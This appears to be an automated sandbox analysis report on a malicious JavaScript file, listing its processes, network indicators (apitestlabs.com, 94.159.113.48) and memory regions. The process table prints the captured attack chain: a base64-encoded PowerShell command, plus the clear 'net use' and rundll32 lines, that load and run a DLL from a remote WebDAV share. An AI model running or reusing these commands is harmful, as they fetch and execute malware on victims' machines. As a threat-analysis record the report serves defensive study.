Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
2251913620121805788.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wr300rc.tpj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qyr1crwa.xev.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2251913620121805788.js"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABhAHAAaQB0AGUAcwB0AGwAYQBiAHMALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgB1AG4AZABsAGwAMwAyACAAXABcAGEAcABpAHQAZQBzAHQAbABhAGIAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAzADEAMQA3ADAAMQAzADUANwA1ADEAMgA1ADUALgBkAGwAbAAsAEUAbgB0AHIAeQA=
|
||
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\apitestlabs.com@8888\davwwwroot\31170135751255.dll,Entry
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\apitestlabs.com@8888\davwwwroot\
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://apitestlabs.com:8888/
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://apitestlabs.com:8888/d
|
unknown
|
||
http://apitestlabs.com:8888/em
|
unknown
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
apitestlabs.com
|
94.159.113.48
|
||
198.187.3.20.in-addr.arpa
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
94.159.113.48
|
apitestlabs.com
|
Russian Federation
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
AA09EFE000
|
stack
|
page read and write
|
||
1FD696A6000
|
heap
|
page read and write
|
||
1FD69699000
|
heap
|
page read and write
|
||
680357E000
|
stack
|
page read and write
|
||
1D0E1D44000
|
heap
|
page read and write
|
||
1FD514D1000
|
trusted library allocation
|
page read and write
|
||
19123248000
|
heap
|
page read and write
|
||
23CB7650000
|
remote allocation
|
page read and write
|
||
9F7A71F000
|
stack
|
page read and write
|
||
1912322D000
|
heap
|
page read and write
|
||
19123493000
|
heap
|
page read and write
|
||
1D0E1AC0000
|
heap
|
page read and write
|
||
1FD518B6000
|
trusted library allocation
|
page read and write
|
||
1D0E1ADF000
|
heap
|
page read and write
|
||
1FD50FC0000
|
trusted library allocation
|
page read and write
|
||
1FD515EF000
|
trusted library allocation
|
page read and write
|
||
23CB7650000
|
remote allocation
|
page read and write
|
||
1FD4F599000
|
heap
|
page read and write
|
||
1FD51470000
|
heap
|
page execute and read and write
|
||
7FFB4AA02000
|
trusted library allocation
|
page read and write
|
||
DDDEFE000
|
stack
|
page read and write
|
||
DDE1FB000
|
stack
|
page read and write
|
||
191237B0000
|
heap
|
page read and write
|
||
1912340F000
|
heap
|
page read and write
|
||
19123223000
|
heap
|
page read and write
|
||
7FFB4ACD0000
|
trusted library allocation
|
page read and write
|
||
1912340F000
|
heap
|
page read and write
|
||
1D0E1B00000
|
heap
|
page read and write
|
||
1D0E1ADB000
|
heap
|
page read and write
|
||
19121421000
|
heap
|
page read and write
|
||
1FD515EC000
|
trusted library allocation
|
page read and write
|
||
1D0E1AEE000
|
heap
|
page read and write
|
||
19123417000
|
heap
|
page read and write
|
||
7FFB4AD00000
|
trusted library allocation
|
page read and write
|
||
68039FE000
|
stack
|
page read and write
|
||
1FD69633000
|
heap
|
page read and write
|
||
1FD514F3000
|
trusted library allocation
|
page read and write
|
||
1FD4F650000
|
heap
|
page read and write
|
||
19123226000
|
heap
|
page read and write
|
||
1912322B000
|
heap
|
page read and write
|
||
1FD5195A000
|
trusted library allocation
|
page read and write
|
||
1FD697C0000
|
heap
|
page read and write
|
||
1912143D000
|
heap
|
page read and write
|
||
19123231000
|
heap
|
page read and write
|
||
19123246000
|
heap
|
page read and write
|
||
1D0E1AE0000
|
heap
|
page read and write
|
||
1FD69611000
|
heap
|
page read and write
|
||
DDD6F4000
|
stack
|
page read and write
|
||
19121449000
|
heap
|
page read and write
|
||
191213AA000
|
heap
|
page read and write
|
||
1FD69720000
|
heap
|
page execute and read and write
|
||
7FFB4AC70000
|
trusted library allocation
|
page read and write
|
||
DDDBFF000
|
stack
|
page read and write
|
||
19121645000
|
heap
|
page read and write
|
||
1FD516E9000
|
trusted library allocation
|
page read and write
|
||
19121434000
|
heap
|
page read and write
|
||
1FD69990000
|
heap
|
page read and write
|
||
1D0E18E0000
|
heap
|
page read and write
|
||
1FD5197D000
|
trusted library allocation
|
page read and write
|
||
9F7A79D000
|
stack
|
page read and write
|
||
7FFB4AAB0000
|
trusted library allocation
|
page read and write
|
||
1FD614DF000
|
trusted library allocation
|
page read and write
|
||
19121640000
|
heap
|
page read and write
|
||
1FD515DB000
|
trusted library allocation
|
page read and write
|
||
7FFB4ABE2000
|
trusted library allocation
|
page read and write
|
||
19123421000
|
heap
|
page read and write
|
||
1FD6967D000
|
heap
|
page read and write
|
||
9F7AA7F000
|
stack
|
page read and write
|
||
7FFB4AC50000
|
trusted library allocation
|
page read and write
|
||
1912323F000
|
heap
|
page read and write
|
||
19123272000
|
heap
|
page read and write
|
||
19121421000
|
heap
|
page read and write
|
||
DDDCFF000
|
stack
|
page read and write
|
||
23CB759A000
|
heap
|
page read and write
|
||
23CB75A7000
|
heap
|
page read and write
|
||
6803BFB000
|
stack
|
page read and write
|
||
1912323D000
|
heap
|
page read and write
|
||
1D0E1A70000
|
heap
|
page read and write
|
||
1FD51010000
|
heap
|
page read and write
|
||
1FD6961D000
|
heap
|
page read and write
|
||
1FD51A08000
|
trusted library allocation
|
page read and write
|
||
6803877000
|
stack
|
page read and write
|
||
1D0E1D40000
|
heap
|
page read and write
|
||
1D0E1D4B000
|
heap
|
page read and write
|
||
191213AB000
|
heap
|
page read and write
|
||
1912322F000
|
heap
|
page read and write
|
||
23CB7575000
|
heap
|
page read and write
|
||
19123320000
|
heap
|
page read and write
|
||
1D0E1ADB000
|
heap
|
page read and write
|
||
1912324D000
|
heap
|
page read and write
|
||
1FD69726000
|
heap
|
page execute and read and write
|
||
23CB7594000
|
heap
|
page read and write
|
||
7FFB4ABD0000
|
trusted library allocation
|
page execute and read and write
|
||
1FD695E0000
|
heap
|
page read and write
|
||
7FFB4ABF0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AA03000
|
trusted library allocation
|
page execute and read and write
|
||
1912144A000
|
heap
|
page read and write
|
||
23CB7567000
|
heap
|
page read and write
|
||
19123225000
|
heap
|
page read and write
|
||
1912323B000
|
heap
|
page read and write
|
||
7FFB4ABC0000
|
trusted library allocation
|
page execute and read and write
|
||
19123223000
|
heap
|
page read and write
|
||
1FD515DE000
|
trusted library allocation
|
page read and write
|
||
7FFB4AB20000
|
trusted library allocation
|
page execute and read and write
|
||
1912337E000
|
heap
|
page read and write
|
||
1912341C000
|
heap
|
page read and write
|
||
23CB7650000
|
remote allocation
|
page read and write
|
||
1D0E1AB3000
|
heap
|
page read and write
|
||
23CB757A000
|
heap
|
page read and write
|
||
19123419000
|
heap
|
page read and write
|
||
23CB7573000
|
heap
|
page read and write
|
||
7FFB4ACF0000
|
trusted library allocation
|
page read and write
|
||
1FD4F5DA000
|
heap
|
page read and write
|
||
7FFB4AC40000
|
trusted library allocation
|
page read and write
|
||
19121380000
|
heap
|
page read and write
|
||
1D0E1AEC000
|
heap
|
page read and write
|
||
19123230000
|
heap
|
page read and write
|
||
7FFB4ACA0000
|
trusted library allocation
|
page read and write
|
||
19123321000
|
heap
|
page read and write
|
||
1FD4F570000
|
heap
|
page read and write
|
||
19123227000
|
heap
|
page read and write
|
||
68031CE000
|
stack
|
page read and write
|
||
23CB7594000
|
heap
|
page read and write
|
||
1FD4F591000
|
heap
|
page read and write
|
||
6803A7E000
|
stack
|
page read and write
|
||
1FD4F64C000
|
heap
|
page read and write
|
||
7FFB4AAE6000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4ABBA000
|
trusted library allocation
|
page read and write
|
||
1D0E5540000
|
heap
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
68037F8000
|
stack
|
page read and write
|
||
19123233000
|
heap
|
page read and write
|
||
1FD4F5B1000
|
heap
|
page read and write
|
||
23CB756B000
|
heap
|
page read and write
|
||
7FFB4AA10000
|
trusted library allocation
|
page read and write
|
||
7FFB4ABB1000
|
trusted library allocation
|
page read and write
|
||
19123242000
|
heap
|
page read and write
|
||
7FFB4AABC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4ACE0000
|
trusted library allocation
|
page read and write
|
||
6803979000
|
stack
|
page read and write
|
||
7FFB4ACC0000
|
trusted library allocation
|
page read and write
|
||
7DF4AEC80000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AAC0000
|
trusted library allocation
|
page execute and read and write
|
||
68038F8000
|
stack
|
page read and write
|
||
680318E000
|
stack
|
page read and write
|
||
1FD4F557000
|
heap
|
page read and write
|
||
1FD515E1000
|
trusted library allocation
|
page read and write
|
||
7FFB4AAB6000
|
trusted library allocation
|
page read and write
|
||
1D0E1AC8000
|
heap
|
page read and write
|
||
23CB7573000
|
heap
|
page read and write
|
||
1FD4F5DF000
|
heap
|
page read and write
|
||
1FD51015000
|
heap
|
page read and write
|
||
1FD61542000
|
trusted library allocation
|
page read and write
|
||
AA09FFB000
|
stack
|
page read and write
|
||
7FFB4AA0D000
|
trusted library allocation
|
page execute and read and write
|
||
23CB7550000
|
heap
|
page read and write
|
||
6803103000
|
stack
|
page read and write
|
||
DDDAFE000
|
stack
|
page read and write
|
||
23CB77B0000
|
heap
|
page read and write
|
||
1D0E1B08000
|
heap
|
page read and write
|
||
23CB7540000
|
heap
|
page read and write
|
||
191213B1000
|
heap
|
page read and write
|
||
7FFB4AC90000
|
trusted library allocation
|
page read and write
|
||
1D0E4D40000
|
trusted library allocation
|
page read and write
|
||
1912323C000
|
heap
|
page read and write
|
||
19121340000
|
heap
|
page read and write
|
||
AA09BFB000
|
stack
|
page read and write
|
||
1FD518B0000
|
trusted library allocation
|
page read and write
|
||
6803B7E000
|
stack
|
page read and write
|
||
191213C3000
|
heap
|
page read and write
|
||
19121310000
|
heap
|
page read and write
|
||
7FFB4AD20000
|
trusted library allocation
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
23CB77B4000
|
heap
|
page read and write
|
||
1912341B000
|
heap
|
page read and write
|
||
23CB7548000
|
heap
|
page read and write
|
||
19123256000
|
heap
|
page read and write
|
||
19123282000
|
heap
|
page read and write
|
||
1FD519D8000
|
trusted library allocation
|
page read and write
|
||
1D0E19E0000
|
heap
|
page read and write
|
||
1912144A000
|
heap
|
page read and write
|
||
7FFB4AD10000
|
trusted library allocation
|
page read and write
|
||
1D0E1AE4000
|
heap
|
page read and write
|
||
1912143E000
|
heap
|
page read and write
|
||
AA09E7E000
|
stack
|
page read and write
|
||
23CB757A000
|
heap
|
page read and write
|
||
DDD7FE000
|
stack
|
page read and write
|
||
1FD51560000
|
trusted library allocation
|
page read and write
|
||
19123242000
|
heap
|
page read and write
|
||
191213B1000
|
heap
|
page read and write
|
||
680377E000
|
stack
|
page read and write
|
||
1D0E1AF3000
|
heap
|
page read and write
|
||
1FD50FB0000
|
heap
|
page readonly
|
||
19121560000
|
heap
|
page read and write
|
||
1FD4F730000
|
heap
|
page read and write
|
||
1FD515F2000
|
trusted library allocation
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
DDDDFF000
|
stack
|
page read and write
|
||
1FD4F550000
|
heap
|
page read and write
|
||
68035FC000
|
stack
|
page read and write
|
||
1FD4F5D8000
|
heap
|
page read and write
|
||
1FD51630000
|
trusted library allocation
|
page read and write
|
||
19121437000
|
heap
|
page read and write
|
||
68034FE000
|
stack
|
page read and write
|
||
7FFB4AC60000
|
trusted library allocation
|
page read and write
|
||
7FFB4AC10000
|
trusted library allocation
|
page read and write
|
||
AA09F7D000
|
stack
|
page read and write
|
||
1D0E1AB0000
|
heap
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
1FD51410000
|
heap
|
page execute and read and write
|
||
1FD4F750000
|
heap
|
page read and write
|
||
1D0E1ACE000
|
heap
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
1912143A000
|
heap
|
page read and write
|
||
1912144A000
|
heap
|
page read and write
|
||
1D0E19C0000
|
heap
|
page read and write
|
||
23CB7500000
|
heap
|
page read and write
|
||
1FD51533000
|
trusted library allocation
|
page read and write
|
||
1912340F000
|
heap
|
page read and write
|
||
19123242000
|
heap
|
page read and write
|
||
23CB74E0000
|
heap
|
page read and write
|
||
19123420000
|
heap
|
page read and write
|
||
1FD614D1000
|
trusted library allocation
|
page read and write
|
||
19121441000
|
heap
|
page read and write
|
||
19121442000
|
heap
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
1FD51629000
|
trusted library allocation
|
page read and write
|
||
23CB759D000
|
heap
|
page read and write
|
||
68036FE000
|
stack
|
page read and write
|
||
1FD50F80000
|
trusted library allocation
|
page read and write
|
||
1FD50FA0000
|
trusted library allocation
|
page read and write
|
||
1FD515D8000
|
trusted library allocation
|
page read and write
|
||
1FD6961B000
|
heap
|
page read and write
|
||
1FD4F7A5000
|
heap
|
page read and write
|
||
1FD696AD000
|
heap
|
page read and write
|
||
23CB756B000
|
heap
|
page read and write
|
||
680347F000
|
stack
|
page read and write
|
||
1912322B000
|
heap
|
page read and write
|
||
19121320000
|
heap
|
page read and write
|
||
7FFB4AC20000
|
trusted library allocation
|
page read and write
|
||
68038FE000
|
stack
|
page read and write
|
||
1912322B000
|
heap
|
page read and write
|
||
19123220000
|
heap
|
page read and write
|
||
7FFB4AA04000
|
trusted library allocation
|
page read and write
|
||
1FD514EB000
|
trusted library allocation
|
page read and write
|
||
19123494000
|
heap
|
page read and write
|
||
1FD514C0000
|
heap
|
page read and write
|
||
19123241000
|
heap
|
page read and write
|
||
DDDFFD000
|
stack
|
page read and write
|
||
23CB7400000
|
heap
|
page read and write
|
||
1912324A000
|
heap
|
page read and write
|
||
7FFB4AC00000
|
trusted library allocation
|
page read and write
|
||
19123265000
|
heap
|
page read and write
|
||
7FFB4AC30000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACB0000
|
trusted library allocation
|
page read and write
|
||
191213B0000
|
heap
|
page read and write
|
||
1FD515E4000
|
trusted library allocation
|
page read and write
|
||
1FD50F50000
|
heap
|
page read and write
|
||
23CB75A7000
|
heap
|
page read and write
|
||
DDD8FE000
|
stack
|
page read and write
|
||
7FFB4ABA0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AC80000
|
trusted library allocation
|
page read and write
|
||
9F7A69A000
|
stack
|
page read and write
|
||
19123241000
|
heap
|
page read and write
|
||
191213AB000
|
heap
|
page read and write
|
||
19121455000
|
heap
|
page read and write
|
||
19123262000
|
heap
|
page read and write
|
||
19121439000
|
heap
|
page read and write
|
||
1FD4F7A0000
|
heap
|
page read and write
|
||
680367F000
|
stack
|
page read and write
|
There are 260 hidden memdumps, click here to show them.